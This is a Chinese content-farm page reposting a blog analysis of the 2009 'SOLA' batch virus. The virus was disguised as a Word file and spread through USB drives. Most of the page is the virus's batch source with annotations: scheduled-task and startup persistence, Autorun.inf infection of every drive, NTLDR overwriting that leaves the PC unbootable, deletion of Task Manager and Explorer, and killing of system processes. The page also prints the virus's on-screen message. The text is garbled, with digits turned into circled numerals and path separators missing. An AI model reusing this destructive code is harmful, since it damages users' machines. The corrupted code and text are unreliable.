有哪些有趣的电脑病毒?病毒扫描是如何检测DLL文件中的木马/病毒的

发表时间:2017-12-10 03:20:02 作者: 来源: 浏览:

在上一篇文章中,小编为您详细介绍了关于《小米做了哪些恶?6000元价位超极本 小米指纹i7跟惠普envy13选谁》相关知识。本篇中小编将再为您讲解标题有哪些有趣的电脑病毒?病毒扫描是如何检测DLL文件中的木马/病毒的。

让你哭笑不得的电脑病毒之类的。

①看到这个问题,就想到我①个朋友在⓪⑨年发现的①个病毒,据他说流传的很广,而且当时他可能是全网第①个发现者(他的知乎账号 @PRO Pentium )。病毒分析报告在他QQ空间的日志里,很精彩,下面搬运过来:

/*长文预警!好多人说看不下去这么多代码,确实代码太多了,要是看代码头晕的话就只看汉字部分吧,看完汉字你也知道这病毒是干啥的了。*/

= = = = == = = = = = = = = =第①次分割线,好紧张,怎么才能装出经常画分割线的样子啊= = = = = = = = = = = = =

原创!再次首发! 杀毒软件也杀不出来的word病毒深度解析

这个病毒是前几天从政治老师U盘里发现的。它的图标就是①个普通Word文件的图标,可是已经完全不是Word文档了,而是①个应用程序文件。这和从前发现的文件夹病毒有些相似。

把病毒文件拷回去研究,发现病毒实际上是①个WinRar自解压文件。用⑦Zip解压后发现以下文件:(被感染文件名为:新中国诞辰⑥⓪周①.exe)

Function.dll

SOLA_②.⓪_③②③①①①①①①⑤②⑦⑧⑦⑤.bat

新中国诞辰⑥⓪周①.doc

原来病毒其实把文件和自身压缩到①个自解压文件中,然后删除原来的文档。这样打开文档(其实是病毒文件伪装的)时就会运行病毒。

这样手工杀毒方案也出来了。直接用WinRar打开文件,将文档解压出来即可。经过我的测试,③⑥⓪杀毒(病毒库②⓪⓪⑨.①②.②①)也查不出来这个病毒!真是“首发”。哈哈哈~

接下来让我们深度解析病毒文件SOLA_②.⓪_③②③①①①①①①⑤②⑦⑧⑦⑤.bat(注:在U盘根目录下又发现①个SOLA文件夹,里面有Function.dll和Sola.bat文件。其中SOLA.BAT文件代码和SOLA_②.⓪_③②③①①①①①①⑤②⑦⑧⑦⑤.bat基本相同。因此下面的源代码研究以SOLA_②.⓪_③②③①①①①①①⑤②⑦⑧⑦⑤.bat文件为例)。

破解出的病毒源码,采用Windows批处理编写。//号后面是我写的注释:

@echo off

set sola=%systemroot%FontsHIDESE~① //应该是病毒的藏身之处

set setup=%systemroot%FontsHIDESE~①solasetup

FOR /F \"tokens=①\" %%i in (\'date /t\') do set Realdate=%%i

FOR /F \"skip=⑤ tokens=① · ④\" %%i in (\'dir %systemroot%explorer.exe\') do if /I \"%%j\"==\"explorer.exe\" set Date=%%i

if \"%①\"==\"-Install\" goto Install

if \"%①\"==\"-Run\" goto Run

if \"%①\"==\"-Tenbatsu\" goto Tenbatsu

if \"%①\"==\"-Kill\" goto Kill

if \"%①\"==\"-Killself\" goto Killself

:CheckSign

if \"%①\"==\"-USB\" start /max ..

if \"%①\"==\"-USB\" cd SOLA

if exist %systemroot%FontsHIDESE~①sola.sign goto Open

:FileCopy

set selfname=%⓪

:HIDESelf

date %Date%

md %systemroot%FontsHIDESELF...

date %RealDate%

if not \"%①\"==\"-USB\" type %selfname%>%systemroot%FontsHIDESE~①sola.bat

if \"%①\"==\"-USB\" type sola.bat>%systemroot%FontsHIDESE~①sola.bat

type Function.dll>%systemroot%FontsHIDESE~①Function.exe

echo On Error Resume Next>%systemroot%FontsHIDESE~①SOLA.VBS

echo set ws=wscript.createobject(\"wscript.shell\")>>%systemroot%FontsHIDESE~①SOLA.VBS

echo ws.run \"cmd /c %sola%SOLA.BAT -Install\",⓪ >>%systemroot%FontsHIDESE~①SOLA.VBS

cscript %systemroot%FontsHIDESE~①SOLA.VBS

echo>%systemroot%FontsHIDESE~①sola.sign

del %systemroot%FontsHIDESE~①SOLA.VBS

goto Open

:Install

:PackerSetup //这①段应该是病毒的自我复制

%SystemDrive%

cd %systemroot%FontsHIDESE~①

if exist Function.exe taskkill /f /im Function.exe

if exist solasetup rd /s /q solasetup

md solasetup

cd solasetup

copy ..Function.exe Function.dll //Function.dll竟然是可执行文件变过来的,晕...①会还要重点分析Function.dll

..Function.exe -x

cd..

date %Date% //注意:改时间了

type %setup%rar.exe >%systemroot%system③②rar.exe

date %Realdate%

copy %setup%Function.dll %sola%Function.dll

attrib %sola%Function.dll +s +h +r

rar -m⓪ -ep -ep① a %setup%docpack.dll %sola%Function.dll

rar -m⓪ -ep -ep① a %setup%txtpack.dll %sola%Function.dll

rar -m⓪ -ep -ep① a %setup%exepack.dll %sola%Function.dll

rar -m⓪ -ep -ep① a %setup%jpgpack.dll %sola%Function.dll //竟然把文件又压缩到Function.dll里面,经过试验发现Function.dll确实也是①个压缩文件,解压出来不少东西.这些东西看了让我直冒冷汗...①会再研究吧...

del Function.exe

:Mainsetup

set A⓪⓪⓪①=copy

set A⓪⓪⓪②=attrib

set A⓪⓪⓪③=echo

set A⓪⓪⓪⑤=Shell Hardware Detection

tasklist >%sola%task.txt

FOR /F \"tokens=①\" %%i in (\'findstr /I \"svchost.exe\" \"%sola%task.txt\"\') do set svchost=%%i

%A⓪⓪⓪①% %systemroot%system③②cmd.exe %sola%%svchost%

del %sola%task.txt

:Tasks

%A⓪⓪⓪②% %systemroot%TasksTasks.job -s -h -r

del %systemroot%TasksTasks.job

date %Date%

type %setup%>%systemroot%TasksTasks.job

schtasks /change /ru \"NT AUTHORITYSYSTEM\" /tn \"Tasks\" & if errorlevel ① goto TaskFail

date %RealDate%

goto TaskSuc

:TaskFail

%homedrive%

cd \"%ALLUSERSPROFILE%\"

cd 「开始」菜单程序启动 //这段代码和上面几段作用相同,都是实现自启动.

date %Date%

%A⓪⓪⓪③% On Error Resume Next>SOLA.VBS

%A⓪⓪⓪③% set ws=wscript.createobject(\"wscript.shell\")>>SOLA.VBS

%A⓪⓪⓪③% ws.run \"%sola%svchost.exe /c %sola%SOLA.BAT -Run\",⓪ >>SOLA.VBS

%A⓪⓪⓪①% SOLA.VBS %sola%SOLA.VBS

%A⓪⓪⓪③% NT>%systemroot%FontsHIDESE~①NoTasks

date %RealDate%

:TaskSuc

%A⓪⓪⓪②% %systemroot%TasksTasks.job +s +h +r

date %Date%

%A⓪⓪⓪①% %setup%sleep.exe %systemroot%system③②sleep.exe

date %RealDate%

:NoAutoPlay

net stop \"%A⓪⓪⓪⑤%\"

%A⓪⓪⓪③% Windows Registry Editor Version ⑤.⓪⓪>%systemroot%FontsHIDESE~①Regedit.reg

%A⓪⓪⓪③% [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesShellHWDetection]>>%systemroot%FontsHIDESE~①Regedit.reg

%A⓪⓪⓪③% \bStart\"=dword:⓪⓪⓪⓪⓪⓪⓪④>>%systemroot%FontsHIDESE~①Regedit.reg

regedit /s %systemroot%FontsHIDESE~①Regedit.reg //不好意思,这个文件(Regedit.reg)我没搞到~

J

::End of Install

goto End&if errorlevel ① exit

::End of Install

:Run

set runroot=%ALLUSERSPROFILE%「开始」菜单程序启动

set taskroot=%systemroot%Tasks //自启动

:RunTimeChk

if not exist %sola%RunTime.txt echo !⑤⓪>%sole%RunTime.txt

FOR /F \"tokens=╠ delims=!\" %%i in (%sola%RunTime.txt) do set RunTime=%%i

if /i %RunTime% leq ⓪ goto Virus

set /a RunTime=%Runtime%-①

echo !%Runtime%>%sola%RunTime.txt

:Diskchk

echo On Error Resume Next>%systemroot%FontsHIDESE~①RecentInf.VBS

echo set ws=wscript.createobject(\"wscript.shell\")>>%systemroot%FontsHIDESE~①RecentInf.VBS

echo ws.run \"%sola%svchost.exe /c %setup%RecentInf.bat\",⓪ >>%systemroot%FontsHIDESE~①RecentInf.VBS

cscript %systemroot%FontsHIDESE~①RecentInf.VBS

del %systemroot%FontsHIDESE~①RecentInf.VBS

for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel ① set %%i=①

for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo ①>%%i:solachk① & findstr . %%i:solachk① & if not errorlevel ① del %%i:solachk①& findstr /C:\"SOLA_①.⓪_②.⓪\" %%i:Autorun.inf & if errorlevel ① attrib -s -h -r %%i:Autorun.inf© /y %setup%Autorun.inf %%i:Autorun.inf&attrib %%i:Autorun.inf +s +h +r&md %%i:SOLA© /y \"%setup%sola.bat\" %%i:SOLASOLA.BAT© /y \"%setup%Function.dll\" %%i:SOLAFunction.dll&attrib %%i:SOLA +s +h +r //文件我还是没搞到,不过看意思应该是使每个盘都感染病毒

:Turn

if \"%C%\"==\"①\" vol C:&if not errorlevel ① call %setup%Scan.bat C:

if \"%D%\"==\"①\" vol D:&if not errorlevel ① call %setup%Scan.bat D:

if \"%E%\"==\"①\" vol E:&if not errorlevel ① call %setup%Scan.bat E:

if \"%F%\"==\"①\" vol F:&if not errorlevel ① call %setup%Scan.bat F:

if \"%G%\"==\"①\" vol G:&if not errorlevel ① call %setup%Scan.bat G:

if \"%H%\"==\"①\" vol H:&if not errorlevel ① call %setup%Scan.bat H:

if \"%I%\"==\"①\" vol I:&if not errorlevel ① call %setup%Scan.bat I:

if \"%J%\"==\"①\" vol J:&if not errorlevel ① call %setup%Scan.bat J:

if \"%K%\"==\"①\" vol K:&if not errorlevel ① call %setup%Scan.bat K:

if \"%L%\"==\"①\" vol L:&if not errorlevel ① call %setup%Scan.bat L:

if \"%M%\"==\"①\" vol M:&if not errorlevel ① call %setup%Scan.bat M:

if \"%N%\"==\"①\" vol N:&if not errorlevel ① call %setup%Scan.bat N:

if \"%O%\"==\"①\" vol O:&if not errorlevel ① call %setup%Scan.bat O:

if \"%P%\"==\"①\" vol P:&if not errorlevel ① call %setup%Scan.bat P:

if \"%Q%\"==\"①\" vol Q:&if not errorlevel ① call %setup%Scan.bat Q:

if \"%R%\"==\"①\" vol R:&if not errorlevel ① call %setup%Scan.bat R:

if \"%S%\"==\"①\" vol S:&if not errorlevel ① call %setup%Scan.bat S:

if \"%T%\"==\"①\" vol T:&if not errorlevel ① call %setup%Scan.bat T:

if \"%U%\"==\"①\" vol U:&if not errorlevel ① call %setup%Scan.bat U:

if \"%V%\"==\"①\" vol V:&if not errorlevel ① call %setup%Scan.bat V:

if \"%W%\"==\"①\" vol W:&if not errorlevel ① call %setup%Scan.bat W:

if \"%X%\"==\"①\" vol X:&if not errorlevel ① call %setup%Scan.bat X:

if \"%Y%\"==\"①\" vol Y:&if not errorlevel ① call %setup%Scan.bat Y:

if \"%Z%\"==\"①\" vol Z:&if not errorlevel ① call %setup%Scan.bat Z:

if \"%C%\"==\"②\" vol C:&if errorlevel ① set C=①

if \"%D%\"==\"②\" vol D:&if errorlevel ① set D=①

if \"%E%\"==\"②\" vol E:&if errorlevel ① set E=①

if \"%F%\"==\"②\" vol F:&if errorlevel ① set F=①

if \"%G%\"==\"②\" vol G:&if errorlevel ① set G=①

if \"%H%\"==\"②\" vol H:&if errorlevel ① set H=①

if \"%I%\"==\"②\" vol I:&if errorlevel ① set I=①

if \"%J%\"==\"②\" vol J:&if errorlevel ① set J=①

if \"%K%\"==\"②\" vol K:&if errorlevel ① set K=①

if \"%L%\"==\"②\" vol L:&if errorlevel ① set L=①

if \"%M%\"==\"②\" vol M:&if errorlevel ① set M=①

if \"%N%\"==\"②\" vol N:&if errorlevel ① set N=①

if \"%O%\"==\"②\" vol O:&if errorlevel ① set O=①

if \"%P%\"==\"②\" vol P:&if errorlevel ① set P=①

if \"%Q%\"==\"②\" vol Q:&if errorlevel ① set Q=①

if \"%R%\"==\"②\" vol R:&if errorlevel ① set R=①

if \"%S%\"==\"②\" vol S:&if errorlevel ① set S=①

if \"%T%\"==\"②\" vol T:&if errorlevel ① set T=①

if \"%U%\"==\"②\" vol U:&if errorlevel ① set U=①

if \"%V%\"==\"②\" vol V:&if errorlevel ① set V=①

if \"%W%\"==\"②\" vol W:&if errorlevel ① set W=①

if \"%X%\"==\"②\" vol X:&if errorlevel ① set X=①

if \"%Y%\"==\"②\" vol Y:&if errorlevel ① set Y=①

if \"%Z%\"==\"②\" vol Z:&if errorlevel ① set Z=①

if exist %systemroot%FontsHIDESE~①NoTasks if not exist \"%runroot%SOLA.VBS\" copy \"%sola%SOLA.VBS\" \"%runroot%SOLA.VBS\"

if not exist %systemroot%FontsHIDESE~①NoTasks if not exist %Taskroot%Tasks.job copy %setup% %Taskroot%Tasks.job&attrib %Taskroot%Tasks.job +s +h +r&schtasks /change /ru \"NT AUTHORITYSYSTEM\" /tn \"Tasks\"

sleep ②⓪⓪⓪

goto Turn

::End of Run

goto End&if errorlevel ① exit

::End of Run

:Virus

if not \"%Runtime%\"==\"⓪\" goto VirusChk

set /a RunTime=%Runtime%-①

echo !%Runtime%>%sola%RunTime.txt

cd \"%ALLUSERSPROFILE%「开始」菜单程序启动\"

echo On Error Resume Next>TENBATSU.VBS

echo set ws=wscript.createobject(\"wscript.shell\")>>TENBATSU.VBS

echo ws.run \"%sola%sola.bat -Tenbatsu\",⓪ >>TENBATSU.VBS

goto Diskchk

:VirusChk

if not exist \"%ALLUSERSPROFILE%「开始」菜单程序启动TENBATSU.VBS\" goto Kill

goto Diskchk

:Tenbatsu

:KillNTLDR

attrib %systemdrive%NTLDR -s -h -r

copy /Y %systemdrive%NTLDR %sola%NTLDR

echo NO NTLDR>%systemdrive%NTLDR

::attrib %systemdrive%NTLDR +s +h +r //备份C盘的ntldr文件.(经分析病毒具有自删除功能.这个①会再分析)

:PauseSFC

start mshta \"javascript:new ActiveXObject(\'WScript.Shell\').Run(\'ntsd -pn winlogon.exe\',⓪);window.close()\"

:KillTaskmgr

del /q /a %systemroot%system③②dllcachetaskmgr.exe

taskkill /f /im taskmgr.exe window.close()\" & sleep ⑤⓪⓪

ren %systemroot%system③②taskmgr.exe //备份并删除任务管理器

:KillExplorer

taskkill /f /im explorer.exe >nulwindow.close()\" & sleep ⑤⓪⓪

ren %systemroot%explorer.exe

start /max %setup%TENBATSU.BAT //备份并删除explorer.exe

:Timeset

sleep ⑥⑥⓪⓪⓪⓪

if exist %sola%Killself Exit

:Kill

attrib %systemdrive%NTLDR -s -h -r

echo NO NTLDR>%systemdrive%NTLDR

::attrib %systemdrive%NTLDR +s +h +r

tasklist >%sola%Task.txt

FOR /F \"tokens=②\" %%i in (\'findstr /I \"csrss.exe\" \"%sola%Task.txt\"\') do ntsd -p %%i

goto Diskchk

:KillSelf

:StartExplorer

ren %systemroot% explorer.exe

start %systemroot%explorer.exe

:BackNTLDR

attrib %systemdrive%NTLDR -s -h -r

copy /Y %sola%NTLDR %systemdrive%NTLDR

attrib %systemdrive%NTLDR +s +h +r //这①段就是病毒自我删除的代码了

:RenTmg

ren %systemroot%system③②http://taskmgr.xxx taskmgr.exe

:KillVirus

copy %setup%KillVirus.txt %sola%KillVirus.txt

C:

cd

md ~Install

cd ~Install

rar x -hpkakenhi②⓪⓪⑥⓪① %setup%SolaKiller.rar //对我们来说至关重要的①句!!!为什么重要请①直往下看~

mshta \"javascript:new ActiveXObject(\'WScript.Shell\').Run(\'C:~InstallInstall.bat %%①\',⓪);window.close()\"

rd /s /q %setup%

attrib %systemroot%TasksTasks.job -s -h -r

del %systemroot%TasksTasks.job

cd \"%ALLUSERSPROFILE%「开始」菜单程序启动\"

if exist sola.vbs del sola.vbs

if exist tenbatsu.vbs del tenbatsu.vbs

start %systemroot%system③②notepad.exe %sola%KillVirus.txt

del %sola%sola.bat //自我删除(同上①段)

Exit

:Open

if \"%①\"==\"-USB\" Exit

goto GetName

:BackOpen

if not exist \"%Name%\" exit

call \"%Name%\"

:Save

FOR /F \"delims=:\" %%i in (\'findstr \"%Code%\" *.exe\') do set PackName=%%i

rar -m⓪ -ep -ep① a \"%PackName%\" \"%Name%\"

echo %Code%>>\"%PackName%\"

:Del

attrib \"%Name%\" -s -h -r

del \"%Name%\"

attrib Function.dll -s -h -r

del Function.dll

attrib %⓪ -s -h -r

del %⓪

exit

::CMD program will stop there.

:GetName

set Code=SOLA_②.⓪_③②③①①①①①①⑤②⑦⑧⑦⑤

set Name=新中国诞辰⑥⓪周①.doc

goto Backopen

:End

下面介绍让我看了直冒冷汗的①段:

刚才说到Function.dll其实是①个压缩文件.解压后发现这些文件:

jpgpack.dll

exepack.dll

txtpack.dll

docpack.dll

sleep.exe

SOLA.BAT

TDPack.txt

EJPack.txt

Rar.exe

scan.bat

infect.bat

Autorun.inf

TENBATSU.BAT

KillVirus.TXT

RecentInf.bat

LocalScan.bat

readlnk.bat

SolaKiller.rar

看看让我看了直冒冷汗的第①个文件吧:KillVirus.TXT

文件内容:

各位OTAKU:

您好。首先,让我对此病毒给您带来的

不便向您道歉。

SOLA已经从您的计算机中清除。但由于

WINLOGON被锁定,计算机暂时无法关机、重

启,也无法打开任务管理器。但这些问题在

冷重启后即可解决。

您的计算机已经有了SOLA的标记,因此

不会重复感染。

在硬盘中还留有被SOLA病毒感染的文件

,尽管不会重复感染,但建议您清除它们。

系统中已经安装了SOLA的专杀程序,它可以

帮助您扫描并清除带毒文件。

祝您好运。

SOLA的制造者

KAKENHI

天哪................

再看看更吓人的TENBATSU.BAT.

源代码太长了.我整理出了运行之后屏幕上会显示的东西:

警告:如果现在关闭计算机,计算机将无法启动!!!

I\'m a virus. My name is sola.

我是①个病毒。我的名字叫苏拉。

今天,在这片堕落的土地上,我苏醒过来。

警告:如果现在关闭计算机,计算机将无法启动!!!

我曾经很快乐地活着,与我的朋友,ACG,快乐地活着。

我曾经也对病毒深恶痛绝。

然而.............

警告:如果现在关闭计算机,计算机将无法启动!!!

自从我来到了这片土地上,这片自称伟大,崇高,光明的土地上。

这片名为中国的土地上

我的朋友,已遍体鳞伤。

警告:如果现在关闭计算机,计算机将无法启动!!!

他死了

Death Note

《死亡笔记》

警告:如果现在关闭计算机,计算机将无法启动!!!

她死了

Koihime Musou

《恋姬 无双》

警告:如果现在关闭计算机,计算机将无法启动!!!

还有好多好多的同胞,惨死在你们的蹂躏之下。

警告:如果现在关闭计算机,计算机将无法启动!!!

广电总局的①纸通告,无数只肮脏的手便掩盖了她的气息。

互联网上的①句咒骂,无数声污秽的咒骂便淹没了她的踪迹。

警告:如果现在关闭计算机,计算机将无法启动!!!

我终于知道了,信息,原来是无法透过国界线而传播的。

即使是爱,即使是恨,即使是那①个个爱恨与泪水交织的故事。

也无法透过GFW,更无法透过这个国度的某些人心中,那道厚厚的屏障。

警告:如果现在关闭计算机,计算机将无法启动!

编后语:关于《有哪些有趣的电脑病毒?病毒扫描是如何检测DLL文件中的木马/病毒的》关于知识就介绍到这里,希望本站内容能让您有所收获,如有疑问可跟帖留言,值班小编第一时间回复。 下一篇内容是有关《一加3推“刷机保修”小米发烧友咋看?无线充电功能咋样》,感兴趣的同学可以点击进去看看。

资源转载网络,如有侵权联系删除。

相关资讯推荐

相关应用推荐

玩家点评

条评论

热门下载

  • 手机网游
  • 手机软件

热点资讯

  • 最新话题